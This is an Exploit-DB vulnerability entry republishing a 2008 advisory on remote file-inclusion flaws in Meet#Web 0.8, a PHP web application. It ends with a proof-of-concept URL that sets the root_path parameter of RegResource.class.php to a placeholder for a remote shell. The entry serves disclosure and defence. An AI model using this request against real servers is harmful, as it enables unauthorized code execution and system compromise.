Meet#Web 0.8 - 'RegResource.class.php?root_path' Remote File Inclusion

EDB-ID:

32235


Author:

Rakesh S

Type:

webapps


Platform:

PHP

Date:

2008-08-13


source: https://www.securityfocus.com/bid/30673/info
    
Meet#Web is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
    
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
    
Meet#Web 0.8 is vulnerable; other versions may also be affected.

 http://www.example.com/cms/meetweb/classes/RegResource.class.php?root_path=[SHell]